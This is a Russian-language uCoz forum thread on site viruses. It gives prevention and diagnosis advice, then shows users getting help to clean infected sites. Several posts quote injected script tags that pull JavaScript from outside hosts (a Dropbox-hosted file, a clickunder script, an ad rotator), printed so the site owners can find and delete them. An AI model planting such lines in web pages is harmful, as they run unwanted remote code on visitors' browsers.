Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    yrceva-elena
    Сообщений: 10
    Репутация: 2

    Сообщение # 541 | 16:44:57 08 Сен 2013
    Прошу помощи на всех моих сайтах вирусы, какие то баннеры в том числе и с порно... Что мне делать??? Умоляю, прошу срочной помощи!!!!!!!!!!!!!
    Вот ссылка http://www.mir-alice.ru/ на один из моих сайтов, на всех остальных тоже самое...

    Добавлено (08 Сен 2013, 16:39:06)
    ---------------------------------------------
    Пыталась восстановить стандартный шаблон, но баннеры не исчезают, я просто в шоке от такого... Что делать??? Как избавится от этих баннеров???

    Добавлено (08 Сен 2013, 16:44:57)
    ---------------------------------------------
    Нашла УРА, на каждую страницу моих сайтов они поставили вот такой скрипт <title>Untitled</title>
    <script type="text/javascript" src="swfobject.js"></script>

    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script></head>

    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 542 | 17:30:16 08 Сен 2013
    Цитата (yrceva-elena)
    Я уже убираю со всех страниц этот скрип Вот из гостевой книги пока не убрала http://www.mir-alice.ru/gb/, и из фотоальбомов, чищу пока другие сайты. Порно баннеры на всех страницах были...

    В гостевой тоже самое <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
    ПУ-управление дизайном-гостевая-Страница с сообщениями
    В верху
    del
    Генератор таблиц HTML онлайн
    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 543 | 17:51:55 08 Сен 2013
    Цитата (yrceva-elena)
    Да спасибо большое, я уже это поняла, у меня много сайтов приходится чистить все, и все страницы, пароли меняю... Как думаете это они мой пароль взломали???

    возможно если шаблон был скачанный, то код уже в нем был.
    Воспользуйтесь, а галочки везде проставьте. Далее замените пароли к сайту и Панели Управления Обязательно
    Прикрепления: 0472644.jpg (69.0 Kb) · 1747345.jpg (105.3 Kb)
    del
    Генератор таблиц HTML онлайн
    Сообщение отредактировал SOCHI1014 - Воскресенье, 08 Сен 2013, 17:53:25
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 544 | 18:55:35 08 Сен 2013
    Цитата
    Цитата (yrceva-elena) пароли меняю... Как думаете это они мой пароль взломали???
    нужно сменить uID пароль профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1
    ставить нужно сложный пароль. очень сложный. и не гуляйте по сайтам системы профилем, которым администрируете сайт. для прогулок держите другой профиль, на котором не будут висеть сайты и который не будет связан с правами на сайтах
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Kapralpv
    Сообщений: 12
    Репутация: 2

    Сообщение # 545 | 09:13:46 10 Сен 2013
    У меня уже не раз появляется рекламный вирус (срабатывает кликандер).
    Код
    <?if(!$USER_LOGGED_IN$)?><script type="text/javascript" src="http://hosts212.ucoz.net/rtr/1-1"></script><?endif?>
    Обычно он внедряется в нижнюю часть сайта, но иногда и на внутренние страницы (страница материала и ком. к нему). Каждый раз вручную удалять его надоело. Как обезопасить свой сайт soldafon.net? Вирус появлялся и до сотрудничества с ПП (если вы скажете, что источник вируса реклама). Пароли от админки, от вебтопа, от ФТП уже менял, комп на вирусы проверял. Я грешу на ДЫРУ в системе безопасности хостинга.
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 546 | 20:12:31 10 Сен 2013
    Ребят, решил про-вебится доктором, итог ниже на скрине (1-ом)
    Появилась какая та левая реклама на сайте уже раз была исчезала и снова появилась (2 скрин)

    НУЖНО РЕШЕНИЕ!

    ======================================================================================


    =======================================================================================

    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 547 | 20:43:53 10 Сен 2013
    IIoJIb3oBaTeJIb, скрипт на который ругается веб удалите

    вот ваша реклама. она выделена красным. остальной код для ориентации

    Цитата
    <body class="modulesload pagesmain urildMain"> <script language="javascript" src="http://uno.wt-rotator105.ru/?t=cf&noadult=1&pid=37303"></script>
    <!--U1AHEADER1Z--><script>
    var div = document.getElementsByTagName('div')[0];


    скрипт на который ругается веб находится в шаблоне верхняя часть сайта. он выделен красным его надо удалить

    Цитата
    <script src="http://uwebo4ka.3dn.ru/scripts/anti_IE/antiieInternet_Explorer.js" type="text/javascript"></script>
    <script type="text/javascript" src="/designs_164/script_site.js"></script>
    <script type="text/javascript" src="/designs_164/fancybox/jquery.fancybox.pack.js"></script>


    и нужно ссылку давать на сайт.
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 548 | 20:54:15 10 Сен 2013
    Цитата (webanet)
    скрипт на который ругается веб удалите

    Извиняюсь я забыл дать ссыль на сайт!
    А где находится сам скрипт вируса?

    Добавлено (10 Сен 2013, 20:54:15)
    ---------------------------------------------

    Цитата (webanet)
    скрипт на который ругается веб находится в шаблоне верхняя часть сайта. он выделен красным его надо удалить

    Зашёл в верхнюю часть сайта и удалил скрипт рекламы, реклама всё равно работает(
    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 549 | 21:07:11 10 Сен 2013
    IIoJIb3oBaTeJIb, ну и где ссылка на сайт? angry
    вы удалили скрипт на который ругается веб. читайте что вам пишут по пять раз. последняя попытка

    вот ваша реклама. она выделена красным. остальной код для ориентации

    Цитата
    <body class="modulesload pagesmain urildMain"> <script language="javascript" src="http://uno.wt-rotator105.ru/?t=cf&noadult=1&pid=37303"></script>
    <!--U1AHEADER1Z--><script>
    var div = document.getElementsByTagName('div')[0];
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 550 | 22:16:55 10 Сен 2013
    Цитата (webanet)
    вы удалили скрипт на который ругается веб.

    Вот именно,что я его удалил, а всё же веб ругается!
    Мой сайт!
    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 551 | 22:21:19 10 Сен 2013
    IIoJIb3oBaTeJIb, скрин ругани доктора веба на что он сейчас ругается. а реклама на сайте осталась
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 552 | 22:25:48 10 Сен 2013




    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    Сообщение отредактировал IIoJIb3oBaTeJIb - Вторник, 10 Сен 2013, 22:33:32
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 553 | 22:29:40 10 Сен 2013
    Код
    <script type="text/javascript" src="/designs_164/fancybox/jquery.fancybox.pack.js"></script>
    там стоит ок. удалите рекламу визардов и все будет нормально

    у вас ещё два скрипта стоит от ювебочки
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 554 | 22:41:28 10 Сен 2013
    Цитата (webanet)
    там стоит ок. удалите рекламу визардов и все будет нормально

    Я извиняюсь за то, что я вас тревожу, может я дурак, но всё же голова работает)
    Начнём с того, что скрипт рекламы в верхней части сайта, я удалил, и реклама уже не появляется)
    Идём дальше - Веб как выкидывал угрозу так и выкидывает в продолжительности.
    Скрипт первый ( [b]//info-cinema.3dn.ru//designs_164/fancybox/jquery.fancybox.pack.js[/b] ) когда я его скидываю на комп, файлом, и проверяю вебом, угроз НЕТ. (поясните пожалуйста почему?)
    Второй скрипт тоже который находится в корне сайта так же реагирует(
    Третий скрипт я не знаю где находится!
    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    volod_ka
    Сообщений: 9
    Репутация: 0

    Сообщение # 555 | 01:15:37 11 Сен 2013
    Здравствуйте.
    На мой сайт vilenashop точка com идет странный трафик с Google с этих ip (66.249.84.172, 66.249.84.75, 66.249.84.223, 66.249.85.109, 66.249.85.21, 66.249.85.79, 66.249.81.20). За один вечер 300 заходов и 100% отказов, а это больше половины посещений в день. Что делать? А то боюсь, что поисковики могут сайт забанить.
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: